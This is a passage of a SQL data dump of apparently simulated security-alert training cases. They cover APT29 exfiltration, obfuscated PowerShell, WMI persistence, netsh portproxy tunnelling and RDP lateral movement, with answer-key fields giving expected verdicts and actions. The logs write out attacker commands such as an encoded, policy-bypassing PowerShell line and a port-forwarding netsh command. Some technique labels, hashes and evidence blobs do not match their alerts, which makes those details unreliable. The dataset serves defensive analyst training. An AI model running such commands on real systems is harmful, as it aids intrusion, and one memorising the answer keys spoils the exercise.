4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"oauth-creation-5678\\\",\\\"action\\\":\\\"create_oauth_app\\\",\\\"user\\\":\\\"compromised_user@example.com\\\",\\\"application_name\\\":\\\"RogueApp\\\",\\\"application_id\\\":\\\"app-123456789\\\",\\\"client_id\\\":\\\"client-98765\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"indicators\\\":{\\\"malicious_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user@example.com\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(436, 'Lateral Movement Detected in Cloud Environment', 'high', 'Network Traffic Analysis', 'A lateral movement within the cloud infrastructure was detected. The attacker, leveraging existing access, targeted additional diplomatic cloud accounts. Indicators of compromise involved suspicious internal IP communications and unauthorized access from a known malicious IP.', 'Cloud Exploitation', 'T1550.004 - Cloud Instance Metadata API', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:45:32Z\",\"source_ip\":\"192.168.1.102\",\"destination_ip\":\"10.0.5.23\",\"external_ip\":\"203.0.113.45\",\"user\":\"diplomatic_user_x\",\"action\":\"login_attempt\",\"status\":\"success\",\"hash\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"filename\":\"malicious_script.sh\",\"description\":\"Detected lateral movement from internal IP 192.168.1.102 to 10.0.5.23 with successful login using diplomatic_user_x. External IP 203.0.113.45 has known malicious activity associated with APT29.\",\"indicator_type\":\"Cloud Exploitation\",\"notable_tool\":\"OAuth Abuse\"}', '2026-01-04 23:55:22', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT29 campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal network IP involved in lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"diplomatic_user_x\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Unusual login pattern detected.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware 
Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious script used by APT29.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(437, 'Data Exfiltration Alert', 'high', 'Data Loss Prevention (DLP) System', 'In the final stage of the operation, attackers attempted to exfiltrate sensitive diplomatic communications and data. The DLP system detected unusual data transfer activities originating from an internal host to an external IP address associated with known malicious activity.', 'Data Exfiltration', 'T1002: Data Compressed', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:07Z\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"action\":\"data_transfer\",\"file_transferred\":\"diplomatic_communications.zip\",\"file_hash\":\"3b5d5c3712955042212316173ccf37be\",\"protocol\":\"HTTPS\",\"alert_id\":\"DLP-20231015-001\",\"description\":\"Unusual data transfer detected to external IP\",\"malware_association\":\"APT29\"}', '2026-01-04 23:55:22', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT29\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host within corporate network\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"diplomatic_communications.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive diplomatic communications\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3b5d5c3712955042212316173ccf37be\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Repository\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT29 exfiltration tactics\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User 
Directory\",\"verdict\":\"internal\",\"details\":\"User within the organization\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.045Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:07Z\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"file_transferred\\\":\\\"diplomatic_communications.zip\\\",\\\"file_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"alert_id\\\":\\\"DLP-20231015-001\\\",\\\"description\\\":\\\"Unusual data transfer detected to external IP\\\",\\\"malware_association\\\":\\\"APT29\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.045Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:07Z\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"file_transferred\\\":\\\"diplomatic_communications.zip\\\",\\\"file_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"alert_id\\\":\\\"DLP-20231015-001\\\",\\\"description\\\":\\\"Unusual data transfer detected to external IP\\\",\\\"malware_association\\\":\\\"APT29\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.045Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:07Z\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"file_transferred\\\":\\\"diplomatic_communications.zip\\\",\\\"file_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"alert_id\\\":\\\"DLP-20231015-001\\\",\\\"description\\\":\\\"Unusual data transfer detected to external IP\\\",\\\"malware_association\\\":\\\"APT29\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.045Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:07Z\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"file_transferred\\\":\\\"diplomatic_communications.zip\\\",\\\"file_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"alert_id\\\":\\\"DLP-20231015-001\\\",\\\"description\\\":\\\"Unusual data transfer detected to external IP\\\",\\\"malware_association\\\":\\\"APT29\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.045Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:07Z\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"file_transferred\\\":\\\"diplomatic_communications.zip\\\",\\\"file_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"alert_id\\\":\\\"DLP-20231015-001\\\",\\\"description\\\":\\\"Unusual data transfer detected to external IP\\\",\\\"malware_association\\\":\\\"APT29\\\"}\"}],\"query\":\"index=main 
source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(438, 'Unusual PowerShell Execution Detected', 'high', 'SIEM logs', 'Volt Typhoon initiates their campaign by executing obfuscated PowerShell scripts to avoid detection and gather preliminary system information.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:00Z\",\"event_id\":4688,\"host\":{\"hostname\":\"workstation-23\",\"internal_ip\":\"10.0.5.23\",\"os\":\"Windows 10\"},\"user\":{\"username\":\"jdoe\",\"domain\":\"CORP\",\"user_id\":\"S-1-5-21-123456789-123456789-123456789-1001\"},\"process\":{\"pid\":4567,\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"command_line\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand aW1wb3J0LX1zZXRDbHkgLnN5c3RlbS5pbmZv\"},\"network\":{\"source_ip\":\"10.0.5.23\",\"destination_ip\":\"203.0.113.15\",\"destination_port\":443,\"protocol\":\"TCP\"},\"file\":{\"name\":\"recon.ps1\",\"path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\recon.ps1\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"}}', '2026-01-04 23:57:09', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known C2 server used by Volt Typhoon\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as part of a known malicious script\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"recon.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual script execution for user 
profile\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.047Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:00Z\\\",\\\"event_id\\\":4688,\\\"host\\\":{\\\"hostname\\\":\\\"workstation-23\\\",\\\"internal_ip\\\":\\\"10.0.5.23\\\",\\\"os\\\":\\\"Windows 10\\\"},\\\"user\\\":{\\\"username\\\":\\\"jdoe\\\",\\\"domain\\\":\\\"CORP\\\",\\\"user_id\\\":\\\"S-1-5-21-123456789-123456789-123456789-1001\\\"},\\\"process\\\":{\\\"pid\\\":4567,\\\"name\\\":\\\"powershell.exe\\\",\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand aW1wb3J0LX1zZXRDbHkgLnN5c3RlbS5pbmZv\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"TCP\\\"},\\\"file\\\":{\\\"name\\\":\\\"recon.ps1\\\",\\\"path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\recon.ps1\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:19.047Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:00Z\\\",\\\"event_id\\\":4688,\\\"host\\\":{\\\"hostname\\\":\\\"workstation-23\\\",\\\"internal_ip\\\":\\\"10.0.5.23\\\",\\\"os\\\":\\\"Windows 
10\\\"},\\\"user\\\":{\\\"username\\\":\\\"jdoe\\\",\\\"domain\\\":\\\"CORP\\\",\\\"user_id\\\":\\\"S-1-5-21-123456789-123456789-123456789-1001\\\"},\\\"process\\\":{\\\"pid\\\":4567,\\\"name\\\":\\\"powershell.exe\\\",\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand aW1wb3J0LX1zZXRDbHkgLnN5c3RlbS5pbmZv\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"TCP\\\"},\\\"file\\\":{\\\"name\\\":\\\"recon.ps1\\\",\\\"path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\recon.ps1\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:19.047Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:00Z\\\",\\\"event_id\\\":4688,\\\"host\\\":{\\\"hostname\\\":\\\"workstation-23\\\",\\\"internal_ip\\\":\\\"10.0.5.23\\\",\\\"os\\\":\\\"Windows 10\\\"},\\\"user\\\":{\\\"username\\\":\\\"jdoe\\\",\\\"domain\\\":\\\"CORP\\\",\\\"user_id\\\":\\\"S-1-5-21-123456789-123456789-123456789-1001\\\"},\\\"process\\\":{\\\"pid\\\":4567,\\\"name\\\":\\\"powershell.exe\\\",\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 
aW1wb3J0LX1zZXRDbHkgLnN5c3RlbS5pbmZv\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"TCP\\\"},\\\"file\\\":{\\\"name\\\":\\\"recon.ps1\\\",\\\"path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\recon.ps1\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:19.047Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:00Z\\\",\\\"event_id\\\":4688,\\\"host\\\":{\\\"hostname\\\":\\\"workstation-23\\\",\\\"internal_ip\\\":\\\"10.0.5.23\\\",\\\"os\\\":\\\"Windows 10\\\"},\\\"user\\\":{\\\"username\\\":\\\"jdoe\\\",\\\"domain\\\":\\\"CORP\\\",\\\"user_id\\\":\\\"S-1-5-21-123456789-123456789-123456789-1001\\\"},\\\"process\\\":{\\\"pid\\\":4567,\\\"name\\\":\\\"powershell.exe\\\",\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand aW1wb3J0LX1zZXRDbHkgLnN5c3RlbS5pbmZv\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"TCP\\\"},\\\"file\\\":{\\\"name\\\":\\\"recon.ps1\\\",\\\"path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\recon.ps1\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:19.047Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:00Z\\\",\\\"event_id\\\":4688,\\\"host\\\":{\\\"hostname\\\":\\\"workstation-23\\\",\\\"internal_ip\\\":\\\"10.0.5.23\\\",\\\"os\\\":\\\"Windows 10\\\"},\\\"user\\\":{\\\"username\\\":\\\"jdoe\\\",\\\"domain\\\":\\\"CORP\\\",\\\"user_id\\\":\\\"S-1-5-21-123456789-123456789-123456789-1001\\\"},\\\"process\\\":{\\\"pid\\\":4567,\\\"name\\\":\\\"powershell.exe\\\",\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand aW1wb3J0LX1zZXRDbHkgLnN5c3RlbS5pbmZv\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"TCP\\\"},\\\"file\\\":{\\\"name\\\":\\\"recon.ps1\\\",\\\"path\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\recon.ps1\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(439, 'Suspicious WMI Activity Spotted', 'high', 'Endpoint detection and response (EDR) alerts', 'The attackers leverage WMI to create persistent footholds, enabling them to execute scripts remotely whenever the system restarts. Detected WMI subscription creation on host with persistent script execution capabilities.', 'Persistence', 'T1084', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T11:32:45Z\",\"event_id\":\"4624\",\"host_ip\":\"192.168.1.15\",\"attacker_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"wmi_class\":\"ActiveScriptEventConsumer\",\"wmi_filter\":\"SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA \'Win32_Process\'\",\"wmi_consumer\":\"malicious_script.js\",\"hash\":\"3d2e1f5a3a4b8c9e123456789abcdef0\",\"description\":\"WMI subscription detected for persistent access\",\"process\":\"wmiprvse.exe\"}', '2026-01-04 23:57:10', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network_scan\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3d2e1f5a3a4b8c9e123456789abcdef0\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious script used in APT campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"malicious\",\"details\":\"Script used in attacks for remote 
execution.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_account_audit\",\"verdict\":\"suspicious\",\"details\":\"User account has been flagged for unusual activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(440, 'Anomalous netsh Configuration Changes', 'high', 'Network traffic analysis', 'Detected suspicious netsh configuration changes potentially used for creating tunnels across the network. This activity is consistent with lateral movement tactics employed by the Volt Typhoon APT group.', 'Lateral Movement', 'T1570: Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:25:43Z\",\"event_type\":\"network\",\"source_ip\":\"10.0.3.45\",\"destination_ip\":\"192.168.1.100\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"action\":\"netsh interface portproxy add v4tov4 listenport=3389 listenaddress=10.0.3.45 connectport=3389 connectaddress=192.168.1.100\",\"process_name\":\"netsh.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"netsh.exe\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-01-04 23:57:10', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.3.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal source IP used in suspicious netsh command.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal destination IP targeted by netsh command.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Volt Typhoon activity.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Known hash for netsh.exe, legitimate system 
utility.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR\",\"verdict\":\"internal\",\"details\":\"Employee account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(441, 'Unexpected Remote Desktop Protocol (RDP) Sessions', 'high', 'RDP logs', 'An unauthorized remote session was detected from an external IP address, indicating a potential lateral movement attempt. The session accessed a high-value system within the network, suggesting an advanced attempt to expand network foothold.', 'Lateral Movement', 'T1021.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:53Z\",\"event_id\":\"4624\",\"logon_type\":10,\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"admin_user\",\"hostname\":\"CORP-SERVER01\",\"logon_process\":\"User32\",\"authentication_package\":\"Negotiate\",\"logon_guid\":\"{b1a2b3c4-1d2e-3f45-6789-abcdef123456}\",\"transmitted_services\":\"-\",\"lm_package_name\":\"NTLM\",\"key_length\":128}', '2026-01-04 23:57:10', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple attacks in the past.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal high-value server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Unexpected use of account during non-business hours.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, 
